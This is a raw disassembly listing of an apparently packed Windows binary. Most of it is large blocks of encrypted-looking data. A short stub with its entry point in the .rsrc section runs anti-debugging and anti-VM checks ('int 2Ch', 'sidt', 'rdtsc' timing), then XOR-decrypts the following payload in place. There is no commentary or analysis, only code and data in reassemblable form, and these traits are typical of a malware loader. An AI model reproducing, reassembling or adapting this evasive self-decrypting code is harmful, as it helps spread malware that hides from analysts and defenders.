		dd 0C737506Eh, 0DFDDD385h, 3A5B6DA6h, 0D3CF98BAh, 0B66CA5DEh
		dd 0E87C3BAh, 0FD21E02Ah, 0D9C039FBh, 1969E4FEh, 46F87153h
		dd 9B41051Bh, 37AD43A2h, 13970AC9h, 93D1A1DAh, 1F84BDF6h
		dd 0F31DE81Dh, 3BCF52Eh, 1CDB0634h, 0BBF42DEDh,	0B2118FF9h
		dd 5BDC395Dh, 561BD682h, 4BE0ACFh, 0B66DB932h, 5C325A0Dh
		dd 0FCB7F1EAh, 9B1436B4h, 0A0B6AEDBh, 0D38345BEh, 0F866E6C1h
		dd 13F27D76h, 501A1E99h, 0ECCAB52Eh, 5F98D1F7h,	63DF5F16h
		dd 97D0092Dh, 3EF063EBh, 0D2066C3Bh, 680B6DD4h,	700B268h
		dd 0DFDB91A3h, 0B64950FAh, 3C98F14Ah, 0EE6F04F9h, 0D39577C3h
		dd 3C6F815Ah, 0CBC42624h, 4E0A4FAAh, 3D55689h, 0ACD891CAh
		dd 3F2FC8F0h, 9687D2D0h, 0A72AE426h, 489B6025h,	0C152A261h
		dd 0EB8738FDh, 0D4B7D6B2h, 8638718Eh, 86B7FCC1h, 13B62AEEh
		dd 338CC51Eh, 0EAE8F4D4h, 83FE142h, 0A72052ACh,	9F09BEFBh
		dd 5C17518Ah, 0FBF49694h, 4DADEEA4h, 0F56B6BC5h, 43C6EC0Eh
		dd 934BA3D8h, 878E7AF5h, 0A3D9154Eh, 0FD81316Ah, 1E561C82h
		dd 0DF72DE1Fh, 0A7685FEh, 6F75FD6Fh, 0E2AC40F6h, 67575D0Dh
		dd 35F52Eh, 9F18EA98h, 92BE2D4Ch, 17FDBDF7h, 0FA6CEA9Eh
		dd 0F48253Eh, 0DB2478D6h, 977F2322h, 6374D6F4h,	0ADF8F12Ah
		dd 0A818A241h, 0DF6F29A2h, 9884419h, 6828619Fh,	4B2DD33Bh
		dd 0F1E526D2h, 0C87C7507h, 1F71739Fh, 0E5823E26h, 24035942h
		dd 0B3ACFAE2h, 0C6DB99F9h, 0EB21591Ah, 0EE40E3B2h, 6365CB63h
		dd 0BFE550EAh, 0DE948D3Bh, 0F3B328EAh, 93CC09D3h, 0B8CEA6D3h
		dd 94F33D36h, 0B7719C91h, 0D4384FDFh, 0E882E675h, 0A8D7ADA6h
		dd 5750BEE2h, 0EF9FA5A3h, 8FC8050Bh, 285D5645h,	0C7C0728Ch
		dd 0BCD863Fh, 0FF3B71B5h, 0BBE1FC16h, 0B47069F7h, 0DD08C4BEh
		dd 0E8A8E11Eh, 0CBAD2FBBh, 0DC985C52h, 4EFC35D7h, 5CA329C1h
		dd 0FBF4A1D7h, 275089C2h, 0B06BAB73h, 4FC8B157h, 0ACA32F05h
		dd 682BEAC5h, 9CA29AD7h, 8A50312Ah, 66144DAAh, 742F65D9h
		dd 138C75EBh, 0F0675309h, 0ECAF6E29h, 900A5E8Bh, 8A7BF56Eh
		dd 0A8D2DCBDh, 0EE6962C5h, 1A7B586Ah, 0BC5C6892h, 1270C211h
		dd 0E24A1EA6h, 30622205h, 9D1BC2E2h, 1F46F226h,	26F8C8CDh
		dd 79EF3DA0h, 1B48C26Eh, 12613805h, 35C168F7h, 6A60599Bh
		dd 53986975h, 0E11B11F9h, 7BB4EDDEh, 32139481h,	7931A265h
		dd 130801A2h, 3413AC1Dh, 7921B50Eh, 5222A1D0h, 99589DE8h
		dd 0BF009942h, 0BCDCD72Eh, 7BD9051Ah, 0B06FEAB9h, 8CC8273h
		dd 0C274D92h, 36A38DDh,	262716C5h, 3EEB9C61h, 8D59200Fh
		dd 9128E4DDh, 949B6025h, 7131E0A9h, 0AE17BD6Dh,	322124E9h
		dd 0F6064469h, 72379D4Ah, 0AC0A6ADh, 0CF7F8432h, 36FBC01Fh
		dd 70DCC825h, 9ED3985Ch, 0FABE7DF2h, 0F7C62435h, 0FB346DB8h
		dd 0BE83B81Ah, 336C3DF9h, 0D0BDC1FAh, 2B7757C3h, 8AF5E232h
		dd 5AB8154Eh, 0D145BC58h, 0B7140DBFh, 784A4B1Bh, 1A724298h
		dd 2F67C75Fh, 1F4638F6h, 0E8FA3711h, 8AF9A545h,	9FD707CFh
		dd 0A9B32466h, 0D7102982h, 0F625EAA9h, 0D21281BAh, 0F1DB9F32h
		dd 2BFCC8D2h, 69CD50Ch,	80D17226h, 0A2D40D47h, 0B7EE57E4h
		dd 0C9C15D7Eh, 712B4005h, 0B447FD5h, 2A706349h,	4304B134h
		dd 1098D20Ah, 520ACB8Eh
		dd 6E5DF98Dh, 64EC6532h, 0DF95519Ah, 95241D8Ah,	4F897792h
		dd 0EFB489A6h, 0BC8B5000h, 9D20CCD4h, 4A10BD1h,	930CD90Fh
		dd 0ADD006B1h, 4043D76h, 0E7205F2Ah, 6F141DAEh,	99EBB060h
		dd 7BA0C66Bh, 310C4F02h, 736CB907h, 9BF186B2h, 0CB821D96h
		dd 0F331BE05h, 0E314554Eh, 0F8C571AAh, 276B3A46h, 0E371A922h
		dd 8409DCC3h, 72A8214Eh, 97C5FD36h, 0C0959939h,	0C0FCF582h
		dd 2498A1BEh, 0FBF4A1CCh, 97ABBDC7h, 0F338803Bh, 0B5D4C6FAh
		dd 379562C9h, 87C0F972h, 0ACA8954Eh, 8BE18EEAh,	0AA124DC6h
		dd 4D8DEC1Bh, 134C4597h, 0F6B43032h, 0E0C45531h, 8488581Dh
		dd 0EBCF52Ch, 5FB1A7D7h, 8F360566h, 531308CDh, 0F32C67A5h
		dd 18961631h, 0E1DB9D16h, 1FD2BCBEh, 1ADFA249h,	80C57325h
		dd 65550D46h, 0B7F0C986h, 258EC01Eh, 0DBFE646Ch, 9A54A7B5h
		dd 0E78CCA57h, 437CB5EEh, 0D49A661Ah, 0BBE019DBh, 0AC559442h
		dd 26EC654Eh, 0C6A1F81Eh, 70245D9Fh, 47507907h,	94F968CEh
		dd 0D27654EAh, 6C1144AAh, 77B0A936h, 9ABC053Eh,	0AFE8C9DEh
		dd 0B3B3EC76h, 4E1148AAh, 61A9F089h, 9C5851B3h,	0ADF0AC34h
		dd 0D290C902h, 3375F773h, 7F0E8C3Ah, 4BC0D7D7h,	0E2603972h
		dd 0E5EB4D54h, 11373A99h, 0C9B8DAh, 0B27069D2h,	937C628Bh
		dd 0EA52331Ah, 0E843E132h, 0A72029EFh, 6897B86Eh, 0DF18518Ah
		dd 0FC2CD72Dh, 0C64F9178h, 0B0E33C61h, 4FC8DA7Ch, 379562C9h
		dd 8780F972h, 0A5A8154Eh, 0D1F7299Dh, 64446692h, 0B729D737h
		dd 3B5B00BEh, 0ACB3B1DBh, 4B44B1E7h, 67A0D9D2h,	9B87F782h
		dd 0A324399Bh, 0A6BD1CE1h, 0AFBF4C7Eh, 0C4207785h, 0B6E4D40Ch
		dd 0FFD11A2Fh, 3A80F9C6h, 6A3E04B2h, 0FE3D631Bh, 9BD40E14h
		dd 0A3D3BE68h, 0D11945BEh, 1D001373h, 3BBC8FAAh, 6E2401DDh
		dd 0CEA204C9h, 1997DD40h, 8C31E436h, 97D04956h,	38DC255Eh
		dd 0C25547BBh, 0C476DA1Fh, 843F79F2h, 231C85BBh, 3F1D1869h
		dd 8694CD06h, 0E463D161h, 930CCE58h, 0AF96A8D3h, 9773D76h
		dd 189DD072h, 33C35C2h,	0ABD891CAh, 5ACCFFE9h, 0A1C3884Bh
		dd 0ACFE62A5h, 92A7017Ah, 36BCD8DFh, 448749A8h,	0E3DC5E60h
		dd 1240BB93h, 238A06C5h, 0BA806BE3h, 0DE8C6D1Dh, 0AFC13B9Fh
		dd 67A81536h, 69E11952h, 86FDDE76h, 0B685DBDAh,	0CA34ADDAh
		dd 573C7A47h, 336CA5DEh, 5282950Ah, 2BB47AA3h, 76C0AF32h
		dd 0E3E826D3h, 0C1F8316Ah, 31204286h, 0E8ADA064h, 134C4592h
		dd 7C68A5DAh, 1BF137F8h, 0D6A099E6h, 43C806B3h,	9F18114Ah
		dd 45EBA266h, 314E4B85h, 624A1B9Ch, 0ECE8A91h, 2DBADFC4h
		dd 7AEB9BA4h, 4513393Ch, 0A7B680CEh, 0B41EBAC5h, 0AEF029A2h
		dd 0CA93BD02h, 41B54005h, 0A244BDAFh, 0E78DDD47h, 0E90904EEh
		dd 669891F3h, 0BBE119BBh, 0E1559642h, 38EC6537h, 8F21230Fh
		dd 95722E96h, 55ED78B2h, 0DA5CD5E7h, 7F45097Fh,	9413C06h
		dd 9EB0A92Bh, 0D399D1B3h, 0E575AE5Ah, 62047D6Eh, 0A7592BE7h
		dd 90FF2BAEh, 1F98663Eh, 543E5265h, 1A90C9C2h, 73ACE546h
		dd 902EBE3Ah, 7E1D3AD7h, 0B7D839B2h, 63991699h,	7C38B1BFh
		dd 63D3D086h, 7873D9ADh, 93794583h, 5FBDA41Ah, 98C4D736h
		dd 8B61FF3Eh, 74503192h, 0F73844BFh, 0D2975CEAh, 3D788E97h
		dd 9B6F34F5h, 965B20C8h, 5047BB37h, 99EC4F3Ah, 0A3DC3AE6h
		dd 1C20516Ah, 0A8F7BC81h, 0D36CF4ABh, 5999028Eh, 0AA68E102h
		dd 0CC1EB5C6h, 5A9EDFD8h, 8314AB53h, 1AD8304Ah,	0EDF487AAh
		dd 7F9D0832h, 762CA573h, 15C9897Eh, 0DF478C32h,	5FFBC07h
		dd 1EB3AD12h, 86E09055h, 7CB77C41h, 0B71CA121h,	84A3457Eh
		dd 0EF289042h, 0B5415B6h, 471E99D2h, 438C3DEEh,	6240D10Ah
		dd 3DB4ED26h, 0E3550966h, 0D9212142h, 930899F9h, 0EBBCFDAFh
		dd 824079B2h, 786CB982h, 0D4F9AB61h, 5BD40115h,	9E4DE2FAh
		dd 8F8AA6D9h, 0AEE6225Ah, 7303437Bh, 0A72E1E9Bh, 57331CBBh
		dd 0B3232130h, 12F1h dup(0)
		assume ds:_data

; =============== S U B	R O U T	I N E =======================================


		public start

start		proc near
		cld
		call	loc_100E42E
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_100E406	proc near		; CODE XREF: .rsrc:0100E47Dp
		push	ebx
		mov	ecx, 0DA5h
		mov	ebx, edx


loc_100E40E:				; CODE XREF: sub_100E406+13j
		xor	[eax], dx
		lea	eax, [eax+2]
		xchg	dl, dh
		lea	edx, [ebx+edx]
		loop	loc_100E40E
		pop	ebx
		retn
sub_100E406	endp

; ---------------------------------------------------------------------------
		db 0A3h, 88h
; ---------------------------------------------------------------------------


loc_100E41F:				; CODE XREF: .rsrc:0100E468j
		pop	ebp
		retn
; ---------------------------------------------------------------------------


loc_100E421:				; CODE XREF: .rsrc:0100E436j
					; .rsrc:0100E447j
		push	ebp
		mov	eax, 8000h
		xor	ecx, ecx
		jmp	short loc_100E455

; =============== S U B	R O U T	I N E =======================================



sub_100E42B	proc near		; CODE XREF: .rsrc:0100E44Ap
					; .rsrc:0100E450p
		rdtsc
		retn
sub_100E42B	endp

; ---------------------------------------------------------------------------


loc_100E42E:				; CODE XREF: start+1p
		test	eax, eax
		jnz	short loc_100E43A
		int	2Ch		; Internal routine for MSDOS (IRET)
		test	eax, eax
		jns	short loc_100E421
		jmp	short loc_100E449
; ---------------------------------------------------------------------------


loc_100E43A:				; CODE XREF: .rsrc:0100E430j
		push	eax
		sidt	fword ptr [esp-2]
		pop	eax
		mov	eax, [eax+6]
		shl	eax, 10h
		jns	short loc_100E421


loc_100E449:				; CODE XREF: .rsrc:0100E438j
		push	ebp
		call	sub_100E42B
		xchg	eax, ecx
		call	sub_100E42B


loc_100E455:				; CODE XREF: .rsrc:0100E429j
		sub	eax, ecx
		mov	ebp, [esp+4]
		sub	dword ptr [esp+4], 0A9B6h
		sub	eax, 100h
		jnb	short loc_100E41F
		sub	ebp, 301006h
		lea	eax, [ebp+301082h]
		mov	dx, [eax-65h]
		call	sub_100E406
		dec	eax
		mov	[eax-28441490h], ah
		mov	ebx, 7B7E2EFBh
		inc	ecx
		mov	edx, [esi-2EBDF71Eh]
		pop	ebx
		xchg	eax, esi
		bound	edx, ds:0C166A906h
		mov	ecx, 0AD08496h
		sbb	[edx+ecx-664C862h], ebx
		lodsd
		ror	dword ptr [esi-1], cl
		mov	cl, 80h
		wait
		cmpsb
; ---------------------------------------------------------------------------
		db 8Dh,	0D3h, 90h
		dd 0DA9A5B30h, 80F1005h, 4ADAC97Eh, 6BA14446h, 1C02C2E9h
		dd 85CF9935h, 0CB123D65h, 0F3436ED0h, 9B0D1D68h, 4864CC57h
		dd 0EAABEBh, 0EBC8795Bh, 0A5953607h, 510701Fh, 0ABE963CAh
		dd 7E411240h, 7A981AF1h, 0D7821E1Dh, 0B5992B2Dh, 927C0036h
		dd 7B45E3EBh, 0D1F91B34h, 80ABD326h, 0ABC728CBh, 0B99F134Eh
		dd 6357190Ah, 4B26C3CBh, 8C8A81D1h, 0AD6D7874h,	93242919h
		dd 59F85550h, 0E0A08EBFh, 64B05355h, 4BAF4228h,	4B230333h
		dd 0B532AA21h, 447D5B59h, 0D1A92FCh, 45F031B0h,	6580EDC9h
		dd 852CAC8Bh, 0ECD83503h, 0F579E498h, 9A318DBAh, 0F706103h
		dd 0D8336EE2h, 0A5B23F1Bh, 2863B6F0h, 5C0A574Fh, 1D307BB4h
		dd 0C53EBEBCh, 4199D855h, 86CD1414h, 521B4155h,	0F3204177h
		dd 0D7C2E99h, 5E56493Ch, 0F21BEFDEh, 0A28E0E28h, 686940AEh
		dd 0F9266642h, 8D7609Ch, 906DFAE4h, 0F997EA1Ch,	0A8C421F4h
		dd 0B9E40AC0h, 97DF7A36h, 2348B5A2h, 7C925547h,	0D7F6FBCAh
		dd 0C4CA2746h, 0A863AC51h, 80224F50h, 76C9A568h, 0CA78D5D7h
		dd 98A4B48Dh, 5C5B2D1Bh, 0DEF44CEFh, 0AC50481h,	0BB5380BDh
		dd 526F264Ch, 720FF405h, 983AB0D2h, 0EC68A3D0h,	9D774BB4h
		dd 0C431926h, 0E32F12DFh, 83E784F7h, 0E9C07EC8h, 0EB086609h
		dd 0F7A16E8Dh, 0C15F8C92h, 0AE0FC721h, 9B4E971Eh, 0AE753F3Ch
		dd 980F0167h, 9C3A9393h, 4965C2D7h, 950512EBh, 1ABC293Ch
		dd 116C4A82h, 9C14716Fh, 2228CD99h, 246BCCC5h, 767E32F1h
		dd 0F5C3754Ah, 0D1EE4A20h, 1D8F8873h, 404693B4h, 5470CEC1h
		dd 0AB7D6C08h, 0AE202513h, 3FF4514Eh, 2207FD3h,	0CD12A8CFh
		dd 0A57CB9DBh, 0B68D9768h, 723CC129h, 0F0FCEBD7h, 725824Fh
		dd 3452202Fh, 607D30D7h, 0DFE90403h, 0B69F7C6Ah, 0CDE2C9A6h
		dd 0B8A688B4h, 3966A40Eh, 0D80C17EFh, 909D2671h, 534A3B82h
		dd 0E705609Ah, 3F983309h, 305CB986h, 6B85BD66h,	0EB369B0Eh
		dd 3EDF0C15h, 68846914h, 1907BFA9h, 6E5B023Dh, 8E72EAD8h
		dd 1BB61614h, 0C7E54005h, 0DF80EBE1h, 6FC29AA6h, 0CDED4AC3h
		dd 0F693C0C5h, 92949AA7h, 0CD14B745h, 0E2907B70h, 0AE43A09Eh
		dd 61424A4Dh, 7CE909F4h, 8348A7AFh, 6E704E7Bh, 0FF2D51FBh
		dd 2B49595Dh, 568856C1h, 0E14FCFAh, 0AEFB04A3h,	0A8084DB2h
		dd 9FA60F7Dh, 0B04E9B83h, 6D524C69h, 885AFD00h,	6856212Bh
		dd 36FD5A57h, 0A298767h, 1AAB0C20h, 0ADF4DCE9h,	545D086Fh
		dd 3BD344CFh, 0A46963BAh, 7A787584h, 0B142DDB3h, 5890756Ah
		dd 93ADB70Bh, 0BA503A36h, 15F6982Ch, 9B9EF472h,	4260F0BDh
		dd 0C5EDE8E5h, 32B3539Ch, 0A24FA40Eh, 7BF48ECCh, 743BF247h
		dd 4866A3EBh, 74FB2260h, 9FD7DE9Ch, 0CAE9462Ah,	0A7551865h
		dd 724FF4CBh, 62E55C3Ah, 0F9CFF4C1h, 0F1AB60D9h, 5BEF4C28h
		dd 771B12A7h, 4243CE53h, 670A5CBh, 0D4F5FA9Dh, 0C1C92643h
		dd 299F034Eh, 8FB48129h, 714C9989h, 55885188h, 86A3C279h
		dd 0B17BA629h, 65FA6744h, 8268B6Ah, 91A24120h, 707C3456h
		dd 0E250533h, 0B6E42528h, 778DBDA6h, 0E1C90D7h,	7BC24BE3h
		dd 8E82EFF1h, 91AE0B1Fh, 0D7B55878h, 9A56132Ah,	785BF9E2h
		dd 1638DDD2h, 9FD8982h,	68E4114Eh, 0F2CBE4AFh, 3389E065h
		dd 4A38A5BAh, 2C43AAE9h, 0E71B1416h, 18BA2739h,	0F7931C80h
		dd 0A21005FDh, 4AEA10C1h, 5D8194C2h, 2B94F1EFh,	0C1A5597Eh
		dd 0BCBC2E33h, 96710318h, 2621C6F8h, 8FFA339Fh,	0F59AC7DEh
		dd 0FF9075E5h, 2BA5191Ch, 303202E2h, 3C8D25A3h,	95E12E98h
		dd 0EE9FCCD0h, 50C94227h, 0EADB51C7h, 70B397Dh,	19D9ABA9h
		dd 7A755F34h, 1C5A5555h, 0B4E1027Dh, 7A7EAC64h,	0B19AA6Fh
		dd 0C803E5AEh, 5353894Fh, 0FA6B8D06h, 4754726Dh, 1AED1258h
		dd 7B27A8FCh, 0C270DDB4h, 59A9AF75h, 0E0718B0Ch, 4A35A9EBh
		dd 0D8096666h, 27D60347h, 6F8D3883h, 47FEE8D6h,	8A57D593h
		dd 91B3403Dh, 0A15E3A38h, 88C4CBC4h, 4956E83Dh,	1C82E69h
		dd 84C9E517h, 266CC94Bh, 1F154242h, 0DCBE63F6h,	82F93695h
		dd 9097C4D9h, 8E07A186h, 86EF4C48h, 0D6D6ED8Bh,	0BCB8A490h
		dd 5542E401h, 7E671411h, 0ACC926DBh, 0E4AF524Fh, 52702FB3h
		dd 2F4DC1F7h, 9FFCD4D6h, 8BC8AFAFh, 719CEFA1h, 898C3203h
		dd 0F6C66B80h, 0A0DC5153h, 614CCC94h, 0DCF95456h, 9C05A4D0h
		dd 27835D6Ah, 0F0A74AA6h, 3B0FECEAh, 6782FF8Ah,	92AE1BA8h
		dd 0BDDA3734h, 0E9066360h, 15328F8Ch, 0BE0EECE9h, 5DA33C71h
		dd 34EDBA10h, 3895FDBFh, 0B3CF8784h, 7E4BF4D0h,	220EA1F0h
		dd 19ECA48Eh, 0EDCE7473h, 0AA83101Dh, 877B3918h, 4D3EEEECh
		dd 2E1BB2B7h, 15948591h, 0C8B2696Fh, 8CEC2722h,	8F791000h
		dd 4B2DE7FBh, 106F8DAFh, 0BFB9284h, 0C6AF6547h,	0A5930228h
		dd 66701208h, 5F0AA6E5h, 3C00B0B5h, 0E6F08EACh,	0F1B85B4Dh
		dd 0BE851753h, 5546F41Fh, 4721C6CFh, 2D1182B3h,	8AC16367h
		dd 0D4B45C6Eh, 88A93F2Ch, 6848E3F1h, 5D26F2AFh,	301AA8BAh
		dd 0E7C76768h, 89A75857h, 876D336Fh, 7D47FFF9h,	461FB7C1h
		dd 2D19688h, 0F1D06B7Fh, 0B4B87D38h, 89650F25h,	6A41E6CEh
		dd 3015DFD2h, 70CA9B82h, 0DDC37154h, 95862C57h,	0F26A1600h
		dd 584FFDD2h, 1E03AFA8h, 76F48384h, 0ECC97F5Eh,	0A09C222Bh
		dd 947C340Ah, 4920D0FEh, 176C88A2h, 13DA8096h, 0C2AF557Bh
		dd 0B6812D02h, 0FE5A1D19h, 7933C1E6h, 3306BCB4h, 0F0F4BE94h
		dd 0C2BD4540h, 0D8B42B22h, 50551B3Ch, 763CC4C2h, 1212B8BAh
		dd 0C9C7929Eh, 0C7AB6C2Bh, 0AE973202h, 6252E2D1h, 5316AEECh
		dd 10198FADh, 0E3C76C76h, 0CCB17630h, 9772380Dh, 5542E6EEh
		dd 7B57F5CBh, 7D4ABBAh,	0F6C37E67h, 0D1BC597Fh,	9E670E13h
		dd 575CE0E4h, 3638FDB9h, 0AE68CB2h, 0DDC7667Eh,	0A7854F55h
		dd 897E0613h, 7354D293h, 90FA1DDh, 17E18787h, 0FED55B17h
		dd 0A88F0F26h, 8F600E1Fh, 43739BD8h, 2B0090B5h,	3CF2BE86h
		dd 0A5A57174h, 0BE893907h, 99741C35h, 5834C0D2h, 1508A2A2h
		dd 0E5EAB8F7h, 0C4B4734Dh, 0A5812A2Dh, 6D6C2B79h, 5D3AC3C6h
		dd 3332E3E2h, 86EB8F8Fh, 0D2A45A79h, 0EF842731h, 7046CE4Dh
		dd 511CABDFh, 93FB2B6h,	0D8A5676Fh, 0DF975A4Bh,	95BC3F35h
		dd 6F40F4F0h, 4A31C5C5h, 2CDC9Dh, 0FCC24E7Ch, 0D2B86456h
		dd 95661430h, 674ADF8Ah, 5A36DEF0h, 0EE88BB6h, 0F3DD5D0Eh
		dd 94DD4A5Ch, 9D680B0Ah, 6E50FBC6h, 2C26DBF3h, 278B8D84h
		dd 0E9C3667Dh, 0ABA22C5Eh, 0F36C0306h, 6B52EAC1h, 270F85A7h
		dd 3DFEE8Bh, 0D7D77E5Bh, 0BFB93236h, 957C0419h,	5624F9F9h
		dd 3407A69Ch, 9D9F49Ah,	0C9A65263h, 0BAA9293Fh,	0B11B1D1Ah
		dd 4E35E7D6h, 717BBAFh,	0E6FE9588h, 0E0C95555h,	0BC871125h
		dd 55440A1Dh, 542FC6DAh, 2532A7A7h, 0CBD74E00h,	0C7AE4959h
		dd 0BD9E0B33h, 6448EDF5h, 7B26E1ADh, 0B2BAAB8h,	0EBE67160h
		dd 0CCB65763h, 0E46F3132h, 6062FEC9h, 551EDBD6h, 268385B3h
		dd 0F6DF437Fh, 0D1A96858h, 99740102h, 7358FFD9h, 3610BBD7h
		dd 0EC96AAh, 0EDD67742h, 0C48F5155h, 825D1E29h,	7F5CE2FCh
		dd 3A0D97CBh, 18EE999Fh, 0F0D67D5Ah, 84E73D30h,	93662119h
		dd 5B6CE5EBh, 230FB3B6h, 15F39CB8h, 0D1A0736Fh,	0D0832521h
		dd 8E4E023Dh, 7E20D6F6h, 2104BFA2h, 0E5D69496h,	0D2B54B4Eh
		dd 0BA87024Eh, 6176122Ch, 7D2FC3CAh, 341CA0A5h,	0C7CFA99Ah
		dd 0E2A55A47h, 0B2912720h
		dd 5B738118h, 553BFFEAh, 100FA3A5h, 0E4CA6003h,	0D9A14A5Dh
		dd 959B303Ah, 6345E484h, 4D36D7DEh, 11E5BADCh, 0E4DF6660h
		dd 0DAB64C51h, 95040433h, 1346EEEFh, 5B35DDC5h,	8E990E2h
		dd 96C66A65h, 0A4AA5570h, 996F0916h, 6A59FFD3h,	2B00F6D9h
		dd 71E9858Ch, 0F9CC7B5Dh, 0B3812F4Dh, 0B064082Dh, 7A52F7F9h
		dd 2F02B0A1h, 3F39BBDh,	0CCF71B7Fh, 0A3982231h,	89590715h
		dd 2503F1F9h, 3419A481h, 9FD9B86h, 0C6A1516Fh, 929C3F1Eh
		dd 8B723076h, 4E26D7C7h, 361682BAh, 0EFF7BD9Eh,	0EA8B2743h
		dd 90A61207h, 410C4D4Fh, 634DE6E4h, 313BB2B1h, 0C3C1726Fh
		dd 0E1D0544Eh, 0AEB33E33h, 6F63EBE4h, 772BF5D4h, 51B89D9h
		dd 0FFCF7254h, 0D4B76549h, 9C473A2Eh, 757C8BC6h, 483CE5D4h
		dd 1DE88089h, 0D2C8486Eh, 0BB35BA36h, 8259AD4Ah, 0FE34918Dh
		dd 417BF034h, 6BE0E78Fh, 0F3E54340h, 942EB439h,	0A45EBFECh
		dd 4E6BD7F9h, 0D5F03DECh, 0F790DDC7h, 0A4315D3h, 0CAD869E7h
		dd 351CB5EEh, 8BC510CEh, 7D6BF8D0h, 7AFCA30Eh, 303D1177h
		dd 0D0DE6701h, 7815B7F6h, 2846A30Fh, 3425A69Bh,	5417F9F7h
		dd 67432549h, 0D69C1124h, 68206D79h, 2E21FAA7h,	5A1687B9h
		dd 0D7A194FDh, 24327A7Ah, 0DCC97AD9h, 9DDADB20h, 34608666h
		dd 3C0F2752h, 9E278988h, 0BA30301Eh, 0F1FFC9D4h, 0DC2888B4h
		dd 0EBA9E0E7h, 49FC5B57h, 1F200A38h, 0BBD92D0Bh, 18FA36B6h
		dd 82B40575h, 0B25C899Ah, 6B9C616Dh, 69F0F80Eh,	4454C3C6h
		dd 0ED3B44E5h, 2BB1B1Dh, 778ABFBCh, 0FA721517h,	0AC959391h
		dd 0B325C73Fh, 6A9EE361h, 0F73D9A8Dh, 0B4973ADFh, 0B4CC3765h
		dd 0A2BFF44Fh, 4CB64845h, 0C90DF29Dh, 0A88A939Ch, 614E2B4Dh
		dd 2CCDA7F4h, 0F9947271h, 0FFF0DBB4h, 0FB9A7A46h, 0E6DC5986h
		dd 0A74E1E5h, 0D69FF838h, 0AECB28CEh, 34760951h, 5139AC9h
		dd 0A4C354C2h, 5D49CC54h, 0A8685050h, 0B3FB2E0Fh, 0B8F19ED5h
		dd 10EF0346h, 1699B19Dh, 78B7591Eh, 8D8F0835h, 7B8A341Ah
		dd 0E5696131h, 63D0BF78h, 0B94F48B7h, 75961Fh, 93B10E00h
		dd 0BD86EABDh, 5F845A31h, 16058869h, 436C0732h,	0E400E8E5h
		dd 99B71519h, 0FC8B83Fh, 3C4E707h, 194FF935h, 0A39321F8h
		dd 7B566D29h, 0CC699140h, 9EB98AC9h, 0A4443207h, 0B7BE61F3h
		dd 4E5CE558h, 0F19B3072h, 95EF2988h, 53386748h,	0FBDC7F99h
		dd 28AFA4F5h, 97719842h, 0AC6A6F9Eh, 2FCC2613h,	16C65A46h
		dd 8B3BCE3Bh, 1E605E30h, 0D79523D1h, 78089EBFh,	722F5EE0h
		dd 0DCFABF01h, 897B837Fh, 44AD846h, 9BE152D7h, 8A8352Fh
		dd 0B6DC1552h, 0E2B9D956h, 0E2AD8985h, 3A57B6B9h, 6786B789h
		dd 4510B09h, 0BCEA1B1Dh, 6C8B9FD4h, 14338BAFh, 4037EAB7h
		dd 6C88E10Bh, 0C3E6470Fh, 571F6A3Ah, 0EE3C4540h, 8DB55CA2h
		dd 4663C1B9h, 70E4BAB8h, 0F5BB7D44h, 88E64340h,	5879039h
		dd 0B63EABBCh, 171D3046h, 7CFCA5BFh, 0F4C01D1Ah, 0EEC8FDB9h
		dd 5187573h, 16687808h,	92EA95C9h, 6A79E181h, 0C312A871h
		dd 83A31D4Ch, 758B8421h, 7549968Fh, 8801114Ah, 490A03ADh
		dd 22CB180Ch, 8DA51005h, 8B7BC417h, 324FAF3Eh, 9E4A7DD5h
		dd 7AFC126Bh, 0E4817E87h, 8FAD0A07h, 0F2BC79D0h, 0B6548185h
		dd 637DD41Eh, 0AADFF706h, 7042CB39h, 0B6035070h, 3DE61977h
		dd 0FF07B784h, 5705E2E4h, 0D2B07B06h, 0AAA1B7BCh, 0F2EA6652h
		dd 7350703h, 9263BD8Ah,	0EB5917B0h, 653F1BD2h, 0CAE3403Dh
		dd 0F10F9CECh, 27051894h, 0C920D3B5h, 0F19EEED2h, 0A0BD1AF9h
		dd 0BEC978C3h, 0C994349Fh, 640FD7CAh, 80E7EBB3h, 3496B234h
		dd 0CC92EE35h, 82B91D49h, 0D1DAED8Bh, 121EA490h, 0EAF7C00Dh
		dd 689DFAF8h, 0ACC92695h, 85A56CCEh, 862E2833h,	2F4CA903h
		dd 0F77F1251h, 3ADF2C2h, 0B2CE2BB3h, 2E8F7769h,	61CBF2Ch
		dd 35512229h, 417174D8h, 0B1882524h, 0C3B1560Eh, 0DFAC222Fh
		dd 8E50FCA6h, 53774BCCh, 16F7ABAAh, 0E2AD758Bh,	0C8F5180Fh
		dd 1641A508h, 0AF03808Ch, 415D9DA8h, 92DA0713h,	0A8987885h
		dd 93200E3Bh, 75C3936h,	1B38959Bh, 2914AFFAh, 17EF8486h
		dd 4F2FE816h, 4CE6736Dh, 0C6241BACh, 0DABB1251h, 1C69F6E8h
		dd 7997F198h, 0F2914C98h, 1A79B617h, 7618455Eh,	175FD10Bh
		dd 9A5C9CCAh, 2DCAA6A2h, 3F397273h, 0D5C2634Ch,	0FE3A7FFFh
		dd 1D626B31h, 0D9B729D0h, 0B58A9371h, 73322928h, 0DFD308D8h
		dd 7238096h, 0DECFF6AAh, 5F49CBABh, 0BAE6BF89h,	5A2E1Dh
		dd 0E0CD6A13h, 81A27D80h, 386481E8h, 0E1F47928h, 8F9B3844h
		dd 8AE8A1B9h, 6300606Dh, 121FBCBEh, 0B632B53Ch,	9585E2F2h
		dd 0A59D6798h, 9C14D138h, 857F0327h, 4869F7ECh,	2D13C4D3h
		dd 3DE78984h, 0E9D87976h, 14D04047h, 45DA3E2h, 0FFB8CA4Ch
		dd 4926A9C2h, 1CC3B914h, 1A089701h, 75E97659h, 0F8157278h
		dd 0DA0C9A16h, 36933638h, 31937958h, 0A7C3201Fh, 9562E72Ch
		dd 1A29D371h, 0C8ECC20Dh, 65E74236h, 0D69DCAC9h, 529B204Fh
		dd 0E8D9CBC5h, 2055F57Bh, 28882AAFh, 0D9781456h, 88A2FE5Ah
		dd 93A62B41h, 88FA5757h, 9FD988EBh, 3661820Ch, 0E9708752h
		dd 1021154Bh, 0B8E40107h, 0D43BD0D2h, 0F3AD89B7h, 33A844B3h
		dd 68E88C8Eh, 26510D61h, 0BEEA0705h, 0C643F69Eh, 0E9628FBDh
		dd 726D890Ch, 0A31D1AE5h, 0C1B4213Ah, 0CB73FDB9h, 0F00D3DE3h
		dd 27B9F393h, 44179AF2h, 191B14B8h, 76BA273Bh, 0CAE64203h
		dd 0F6DAD1E0h, 95319B99h, 3AE4D88Bh, 7EFCEEC0h,	0F2C01D1Ch
